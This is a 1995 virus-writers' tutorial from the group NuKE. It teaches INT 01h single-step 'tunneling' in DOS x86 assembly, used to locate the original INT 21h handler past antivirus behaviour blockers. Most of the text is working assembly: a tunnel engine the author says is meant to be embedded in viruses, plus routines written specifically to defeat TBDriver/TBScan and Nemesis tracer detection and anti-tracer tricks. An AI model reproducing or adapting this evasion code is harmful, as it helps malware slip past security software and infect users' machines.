Single Stepping Tunnel Techniques


                             Dark Fiber of [NuKE]

                                   presents

                      Single Stepping Tunnel Techniques

                                    Part 1

                               21st August 1995



File Descriptions:

df-tunnl.doc    - This document
example.asm     - Example program that calls tunnel.asm
example.com     - Compiled example.asm
tunnel.asm      - The basic tunneling engine.
f-Tunnel.asm    - Full blown tunnel engine.
f-exampl.asm    - Example using F-Tunnel
f-exampl.com    - Compiled f-exampl.asm



  Tunneling with INT 01h is an easy thing to do, about as easy as writing
*.COM file viruses, but, for some reason, guides for using INT 01h tunneling
techniques dont exist like *.COM file virus guides do, so I'm going to remedy
that.


  The Intel and its clone 8086+ compatibles have a nice mode built into them
called Single Stepping, and its VERY handy for programmers like us, who
want to find something specific in memory, for example, the kernel Int 21h
segment:offset, and bypassing other blocking TSR programs, such as Anti-Virus
behaviour blockers.  This tunneling technique is not the be all and end all
of tunneling, as I will discuss some techniques and why they work against
this kind of tunneling further on.


  In order to use the Single Step mode, we need to modify one of the bits
in the flag, and have set up an interrupt.

  The flag is a 16bit register and consists of the following fields.

                  ÚÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄÂÄÄż
          flags   ł--ł--ł--ł--łOFłDFłIFłTFłSFłZFł--łAFł--łPFł--łCFł
                  ŔÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄÁÄÄŮ
                   0F 0E 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00

        CF : Carry Flag         Indicates an arithmetic carry
        -- : Unused
        PF : Parity Flag        Indicates an even number of 1 bits
        -- : Unused
        AF : Auxilary Flag      Indicates adjustment needed in BCD numbers
        -- : Unused
        ZF : Zero Flag          Indicates a zero result, or equal comparison
        SF : Sign Flag          Indicates negative result/comparison
        TF : Trap Flag          Controls Single Step operation
        IF : Interrupt Flag     Controls whether interrupts are enabled
        DF : Direction Flag     Controls increment direction on string regs.
        OF : Overflow Flag      Indicates signed arithmetic overflow
        -- : Unused
        -- : Unused
        -- : Unused
        -- : Unused


  The only one we need to concern ourselves with is the TF flag.
When the trap flag is off, well, the Int 01h is not used, but when we turn
the TF to on, the Int 01h routine is called BEFORE each instruction is
executed.

  So, with that order in mind, you must hook the Int 01h, THEN turn on the
trap flag.

  First thing that we must do is to hook Int 1h, then we need to set Int 1h,
set the trap flag to on, then lastly, call a function that we wish to trace.

For the example code presented, we will be tunneling Int 21h.
All the code is for a minimum of an 80286 or greater, because I dont care
for coding for the lesser 8086 machine. ;)


;== [ 80286+ | Priming the Tunnel code ] ======================================
; This code will save and hook INT 01h, and put the processor into single
; stepping mode.
;


Int_01v:        dd ?                            ;Old address for Int 01h
Int_21v:        dd ?                            ;the tracer modifies this.

Tunnel:
        pusha                                   ;Save our registers,
        push    es                              ;Assume we are being called
        push    ds                              ;from an external source.

        mov     ax,03521h
        int     021h                            ;Get Int 21h
    cs: mov     word ptr [Int_21v],bx           ;Save Int 21h address
    cs: mov     word ptr [Int_21v + 2],es

        mov     al,01h                          ;Get Int 01h
        int     021h
    cs: mov     word ptr [Int_01v],bx           ;Save Int 01h address
    cs: mov     word ptr [Int_01v + 2],es

        push    cs
        pop     ds                              ;Set DS = CS for OUR Int 01
                                                ;address.
        mov     ah,025h
        mov     dx,offset Int_01Handler         ;Our Int 01h routine
        int     21h                             ;Set our Int 01h routine

        ;This first PUSHF, is used in conjunction with the CALL FAR [Int_21v]
        ;code, as we need a FLAGS on the stack that has not got the TF
        ;turned to ON.

        pushf

        pushf
        pop     ax                              ;Save the flag
        or      ax,0100                         ;Set the TF to ON
        push    ax
        popf                                    ;restore the flags

        ;The moment we POPF the flags, the trace mode is initiated
        ;Because of the way it works, the first instruction immediately
        ;following the POPF is NOT traced, tracing begins with the
        ;second instruction AFTER the POPF.

        mov     ax,03306                        ;Set AX for INTERNAL_DOS_VERS.
        call    far [Int_21v]                   ;Call the Int 21.
                                                ;we are faking an INT 21 call.

        ;The Int_01Handler routine takes over from here until the trace
        ;is finished. Only when it's finished will control pass back to this
        ;piece of code.

        ;When control is passed back, Int_21v will hold the segment:offset
        ;of the last cross segment jump before the trace ended.

        ;Restore the old Int_01h vector
        lds     dx,word ptr [Int_01v]
        mov     ax,02501
        int     21h

        pop     ds
        pop     es
        popa                                    ;Restore registers
        ret

;==============================================================================


  Okey, before I code the Int_1_Handler routine for you, we need to go
over some more theory.

  First, is that the Int_1_Handler routine is designed to check what opcode
is going to be run next, so we need to know what some of the opcodes that
we will need to check for are.


        26h             ES:
        2Eh             CS:
        36h             SS:
        3Eh             DS:
                        These four are the segment overrides, and are ALWAYS
                        placed BEFORE the opcode, but the CPU sees them as
                        part of the same opcode, so we must check for these
                        and then siphon them off, to get the byte value of
                        the real opcode.  We also use them for to determine
                        what segment to take data from on things like FAR
                        cross segment jumps.

        9Ch             PUSHF
                        We need to know this so we can get around Nemesis.

        9Dh             POPF
                        We need to check for the POPF because we dont want
                        any other program from turning off the TrapFlag, and
                        thus, dissableling our trace.

        CFh             IRET
                        This is what we use to signal that our trace should
                        end.

        EAh             JMP xxxx:yyyy
        FFh 1Eh         CALL FAR [xxxx]
        FFh 2Eh         JMP FAR [xxxx]

                        These three opcodes are used as cross segment jumps,
                        which commonly hold the seg:offs of the next Int hook.
                        Because the last two (FF1Eh, FF2Eh) take data from
                        the segment override, or the current DS, we need to
                        know what that is too.


;== [ 80286+ | Tunnel Engine ] ================================================
;This is the actual code that does all the hard work.
;It has been somewhat (20bytes) optimised from the engine I used in Lady Death
;And bugfixed too ;)

;These are our register offsets into the SS:SP[BP]

        _rfl    equ 01A
        _rcs    equ 018
        _rip    equ 016
        _ax     equ 014
        _cx     equ 012
        _dx     equ 010
        _bx     equ  0E
        _sp     equ  0C
        _bp     equ  0A
        _si     equ  08
        _di     equ  06
        _es     equ  04
        _ds     equ  02
        _ss     equ  00

Int_01Handler:
        pusha
        push    es
        push    ds                     ;Save ALL registers.
        push    ss                     ;Its not really necessary to save SS ;)
        mov     bp,sp                  ;but this engine was built for expansion

        ;One thing to note, if you want to know the TRUE value of SP, that
        ;is, you must subtract 6 from it, which covers the calling cs, ip & f.
        ;and thats sub w[bp+_sp],6  not sub sp,6 ;)

        push    cs
        pop     ds

        test    b[_status],1
        je      RunNextTest_1
        xor     b[_status],1
        and     word ptr [bp+_rfl+2],0feff
        jmp     GetOpCode

RunNextTest_1:


GetOpCode:
        lds     si,word ptr [bp+22]     ;Get the seg:off of the next opcode

        cld                             ;clear direction
        lodsb                           ;get opcode

        ;AL now holds our bytevalue opcode.

        ;Check for a segment override, and if not, assume its working in DS
        call    GetSegOveride           ;Get the segment override
                                        ;bx = segment we will be using.

        ;Check the OPCode in AL
        cmp     al,09dh                 ;POPF?
        jne     ItsNotPOPF
        ;They are attempting to POP the flags.  Just incase they have tried
        ;to turn the TF off, we keep it turned on.
        or      word ptr [bp+_rfl+2],0100 ;Keep TRAPFLAG set to on.

ItsNotPOPF:
        cmp     al,09c
        jne     ItsNotPUSHF
    cs: or      byte ptr [_status],1

ItsNotPUSHF:
        cmp     al,0cf                          ;IRET
        jne     ItsNotIRET
        ;An IRET signals the end of our trace.
        ;So turn the TF to off.
        and     word ptr [bp+_rfl],0feff        ;Turn trace flag off

ItsNotIRET:
        cmp     al,0eah                 ;Jmp xxxx:yyyy
        jne     ItsNotFarJump

        ;A Cross segment jump!  Save the seg:offset its going to jump into.
        ;The data for the cross seg jump is contained in the CS: seg.
        ;So, no change is needed.

FarJumpData:
        lodsw
    cs: mov     word ptr [Int_21v+0],ax
        lodsw
    cs: mov     word ptr [Int_21v+2],ax
        jmp     RunNextOpCode


ItsNotFarJump:
        cmp     al,0ffh                 ;jmp d[xxxx]
        jne     ItsNotJmpD

        cmp     byte ptr [si],01eh      ;jmp d[xxxx], type 1
        jne     ItsJmpD
        cmp     byte ptr [si],02eh      ;jmp d[xxxx], type 2
        jne     ItsNotJmpD

ItsJmpD:
        inc     si                      ;skip jump type

        ;This opcode can use a segment override, so use it!
        mov     ds,bx                   ;segment override
        lodsw                           ;get storage offset of seg:offs
        mov     si,ax                   ;
        jmp     FarJumpData             ;treat it like jmp xxxx:yyyy


ItsNotJmpD:
        ;Next opcode here....
        ;Well, we dont need to monitor any more opcodes....

RunNextOpCode:
        pop     ss
        pop     ds
        pop     es                      ;Restore the flags
        popa
        iret                            ;Run the next opcode.



GetSegOveride:
        cmp     al,026h                 ;ES
        jne     NotSegES
        mov     bx,word ptr [bp+_es]
        lodsb                           ;Skip seg override, to get next opcode
        ret

NotSegES:
        cmp     al,02eh                 ;CS
        jne     NotSegCS
        mov     bx,word ptr [bp+_rcs]
        lodsb                           ;Skip seg override, to get next opcode
        ret

NotSegCS:
        cmp     al,036h                 ;SS
        jne     NotSegSS
        mov     bx,word ptr [bp+_ss]
        lodsb                           ;Skip seg override, to get next opcode
        ret

NotSegSS:
        cmp     al,03eh                 ;DS
        jne     NotSegDS
        mov     bx,word ptr [bp+_ds]
        lodsb                           ;Skip seg override, to get next opcode
        ret

NotSegDS:
        mov     bx,word ptr [bp+_ds]    ;DS
        ret                             ;No override, so assume DS

_status: db 0

;==============================================================================



  The code presented here is, when compiled, somewhere around 200bytes
long.  Which I think is not too big, when you include it in a virus.
The engine presented here was very basic in its structure.  It did not
check for things like

                JMP DOUBLE [BX+4]
                JMP DOUBLE [BX]
                JMP DOUBLE [SI-4]

                etc,
                or

                CALL DOUBLE [BX]

The reason being is that there are lots of other techniques for cross segment
jumping, and including all types would expand the engine considerably, and
they would not really be necessary in a virus.





                      Single Stepping Tunneling Techniques

                                     Part 2

                                  Anti-Tracers

  Okey, so you have run the Example.Com program and TBDriver has beeped
to the tune of Example.Com is trying to trace the Interrupt chain, or something
to that effect.  Your first question should be "How the hell does it know we
are tracing it?"

Well, I'm glad you asked! ;)

Here is a simple representation


        Code Memory                             Stack Memory

        mov     ax,1234h
        push    ax                              1234h
        mov     bx,5678h                        1234h
        mov     cx,DEADh                        1234h
        push    cx                              DEADh, 1234h
        push    bx                              5678h, DEADh, 1234h

        pop     ax      ;=5678h                 DEADh, 1234h
        pop     bx      ;=DEADh                 1234h
        pop     cx      ;=1234h

Now, even tho we have popped them off memory, what has actually happend is
that the SP add had 2 added to it each time, adjusting where it points to,
but those values ARE STILL IN MEMORY, just below where SP points to currently.

        so, if we did

        sub     sp,6

        the Stack Memory would look like

        5678h, DEADh, 1234h

The contents of memory have not been altered in any way, just the pointer
to the memory has.


Now, using the above example, this is what happens when we tunnel

assume,   int 1 CS=code, flags=flags, and the # is the ip.

When an INT occurs, it pushes the flags, cs, and ip onto the stack.

        Code Memory                     Stack Memory
cs:=code

1)      mov     ax,1234h
2)     *int     1*                              3, code, flags,
3)      push    ax                              1234h
4)     *int     1*                              5, code, flags, 1234h
5)      mov     bx,5678h                        1234h
6)     *int     1*                              7, code, flags, 1234h
7)      mov     cx,DEADh                        1234h
8)     *int     1*                              9, code, flags, 1234h
9)      push    cx                              DEADh, 1234h
a)     *int     1*                              b, code, flags, DEADh, 1234h
b)      push    bx                              5678h, DEADh, 1234h
c)     *int     1*                              d, code, flags, 5678h, DEADh...
d)      pop     ax      ;=5678h                 DEADh, 1234h
e)     *int     1*                              f, code, flags, DEADh, 1234h
f)      pop     bx      ;=DEADh                 1234h
10)    *int     1*                              11, code, flags, 1234h
11)     pop     cx      ;=1234h


Now, if we were to subtract SP by 6, this time our Stack Memory would look
like this,

        code, flags, 1234

Notice that the bottom 4 bytes are not 5678h, DEADh, thats because when an
Int 1 occurs, it overwrites what's underneath it.

(Hope I'm explaining this so you understand ;)

This is how TBdriver detects a tracer is in memory.

Here is the actual TBDriver code

        push    bx
        push    ax
        xchg    ax,bx
        pop     ax
        dec     sp
        dec     sp
        pop     bx
        cmp     ax,bx
        pop     bx

Now, when it's run without a tracer its Stack Memory looks like this

assume ax=1234, bx=5678

        Code                            Stack
        push    bx      ;bx=5678h       5678h

        push    ax      ;ax=1234h       1234h, 5678h

        xchg    ax,bx   ;ax=5678h       1234h, 5678h
                        ;bx=1234h

        pop     ax      ;ax=1234h       5678h
                        ;bx=1234h
        dec     sp                      34h, 5678h
        dec     sp                      1234h, 5678h

        pop     bx      ;ax=1234h       5678h
                        ;bx=1234h

        cmp     ax,bx   ;ax=1234h       5678h
                        ;bx=1234h

        pop     bx      ;ax=1234h
                        ;bx=5678h


Underneath the stack, it looks like this

                        1234h,  5678h

Because the SP is decremented, and the stack untouched, 1234h is still
there.

Now, if we traced it....

        Code                            Stack
        push    bx      ;bx=5678h       5678h

       *int     1*                      ip, code, flags, 5678h

        push    ax      ;ax=1234h       1234h, 5678h

       *int     1*                      ip, code, flags, 1234h, 5678h

        xchg    ax,bx   ;ax=5678h       1234h, 5678h
                        ;bx=1234h

       *int     1*                      ip, code, flags, 1234h, 5678h

        pop     ax      ;ax=1234h       5678h
                        ;bx=1234h

       *int     1*                      ip, code, flags, 5678h

        dec     sp                      ags, 5678h
        dec     sp                      flags, 5678h

       *int     1*                      ip, code, flags, flags, 5678h

        pop     bx      ;ax=1234h       ;5678h
                        ;bx=flags
       *int     1*                      ip, code, flags, 5678h

        cmp     ax,bx   ;ax=1234h       5678h
                        ;bx=flags

       *int     1*                      ip, code, flags, 5678h

        pop     bx      ;ax=1234h
                        ;bx=5678h


Now, when SP is decremented, because the last value pushed was the flags,
it overwrote the previously pushed AX in memory...... TB detects this,
notices its not what it expected it to be, and knows we are tracing it.

How do we get around this?  Well, in TBDriver, it's structured so that
the first two bytes are a short jump OVER a far jump to the original
DOS Int21h..... So we check for TBcode, and use the far jump data ;)

The code to fool TBScan looks like this

;Place this code underneath the ItsNotJmpD: label.
TBKiller:
        cmp     al,0fah                         ;CLI?
        jne     EndTBKiller
        lodsw
        cmp     ax,0fc9c                        ;Is it TBDriver?
        jne     EndTBKiller
        lodsw
        cmp     ax,05053                        ;TBDriver?
        jne     EndTBKiller
        sub     si,10
        mov     w[bp+_rip],si                   ;Run the original FAR jump
        inc     si                              ;skip EAh, so its data.
        jmp     FARJumpData

EndTBKiller:



"Gee, I heard Nemesis is damn tricky?"  Eh? Not any more!  All Nemesis
does to find tracers is do a PUSHF, then check W[BP+xx],0404, JB,
Now, if the TF is on, the FLAGS is > 0404, so, we add a status bit that
tells us that the LAST OPCODE RUN was a PUSHF, so remove the TF ;)
Now is that simple or what?


The last method of killing a tracer while its running goes like this.

1.  Get the address of Int 1h
2.  Replace the first byte of the Int 1h seg:offs with an IRET opcode
3.  Remove the trace flag
4.  Restore the frist byte of Int 1h

To do that the code looks like

        mov     ax,03501h
        int     21h
        mov     cl,0CFh
    es: xchg    byte ptr [bx], cl
        pushf
        pop     ax
        and     ax,0feff
        push    ax
        popf
    es: xchg    byte ptr [bx], cl


Now, how do you defeat this?  Well, this *type* is pretty easy to avoid to.
The code goes something like this.

;Under the EndTBKiller: label goes this,

Kill_INT_1_Killers:
        cmp     al,0CDh                                 ;INT call?
        jne     End_Kill_Int_1_Killers
        cmp     byte ptr [si],021h                      ;21?
        jne     End_Kill_Int_1_Killers
        cmp     word ptr [bp+_ax],03501                 ;GET INT 1?
        jne     End_Kill_Int_1_Killers
    cs: or      byte ptr [_Status],2                    ;turn on fake int adres
End_Kill_Int_1_Killers:


;Under  RunNextTest_1:  put the code
        test    byte ptr [_Status],2            ;fake the address?
        je      RunNextTest_2
        xor     byte ptr [_Status],2
        mov     ax, word ptr [Int_01v]          ;get the orig, int 1 address
        mov     word ptr [bp+_bx],ax            ;put in into bx
        mov     ax, word ptr [Int_01v+2]
        mov     word ptr [bp+_es],ax            ;put it into es
        ;Now when it writes a byte to int 1, it
        ;will be writting to the unused int 1.
RunNextTest_2:

But what happens if they get our Int_1 address directly from the IVT?
Well..... you can check if they are putting a byte into our segment,
but, because of the miriad of different ways one can put a byte into
a position in memory, well, if you are a masochist you can come up with
that code all by yourself.

Well, I hope I've explained it so that you understand how tunnelers work.
If you want to see a different kind of tunneler check out ART 2.2, the
full source code is in vlad#4. This tunneler does not use int 1, but rather
decodes each single opcode.

Ah well, if you didn't understand then i really screwed up.